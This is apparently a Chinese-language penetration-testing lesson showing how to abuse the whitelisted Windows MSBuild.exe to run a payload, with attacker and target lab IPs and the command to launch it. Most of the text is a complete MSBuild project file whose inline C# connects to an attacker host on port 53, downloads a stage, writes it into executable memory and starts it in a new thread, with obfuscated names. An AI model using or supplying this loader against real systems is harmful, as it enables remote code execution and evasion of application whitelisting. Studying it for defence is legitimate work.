MSBuild简介:

MSBuild 是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio的新的生成平台。MSBuild在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio的生成实验室环境中组织和生成产品。

MSBuild 引入了一种新的基于 XML的项目文件格式,这种格式容易理解、易于扩展并且完全受 Microsoft 支持。MSBuild项目文件的格式使开发人员能够充分描述哪些项需要生成,以及如何利用不同的平台和配置生成这些项。

说明:Msbuild.exe所在路径没有被系统添加PATH环境变量中,因此,Msbuild命令无法识别。

基于白名单MSBuild.exe配置payload:

Windows 7默认位置为:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

攻击机:192.168.1.4 Debian
靶机: 192.168.1.3 Windows 7

靶机执行:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Micropoor.xml

第七十一课:基于白名单Msbuild.exe执行payload第一季 - 图1

配置攻击机msf:

第七十一课:基于白名单Msbuild.exe执行payload第一季 - 图2

附录:Micropoor.xml

注:x86 payload

  1. <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3. <!‐‐ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj Micropoor ‐‐>
  5. <Target Name="iJEKHyTEjyCU">
  7. <xUokfh />
  9. </Target>
  11. <UsingTask
  13. TaskName="xUokfh"
  15. TaskFactory="CodeTaskFactory"
  17. AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
  19. <Task> 
  21. <Code Type="Class" Language="cs">
  23. <![CDATA[
  25. using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
  27. public class xUokfh : Task, ITask {
  29. [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
  31. [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM,IntPtr adztSHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
  33. [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
  35. static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
  37. IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx), XBUCexXIrGIEpe);
  39. Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  41. try { zCoDOd.Connect(DRHsPzS); }
  43. catch { return null;}
  45. byte[] OCrGofbbWRVsFEl = new byte[4];
  47. zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
  49. int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
  51. byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
  53. int GFtbdD = 0;
  55. while (GFtbdD < auQJTjyxYw)
  57. { GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw ‐ GFtbdD) < 4096 ? (auQJTjyxYw ‐ GFtbdD) : 4096, 0);}
  59. byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
  61. Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0] = 0xBF;
  63. return MlhacMDOKUAfvMX;}
  65. static void NkoqFHncrcX(byte[] qLAvbAtan) {
  67. if (qLAvbAtan != null) {
  69. UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
  71. Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx), qLAvbAtan.Length);
  73. IntPtr WCUZoviZi = IntPtr.Zero;
  75. UInt32 JhtJOypMKo = 0;
  77. IntPtr UxebOmhhPw = IntPtr.Zero;
  79. WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
  81. WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }} 
  83. public override bool Execute()
  85. {
  87. byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.1.4", 53);
  89. NkoqFHncrcX(uABVbNXmhr); 
  91. return true; } }
  93. ]]>
  95. </Code>
  97. </Task>
  99. </UsingTask>
  101. </Project>

Micropoor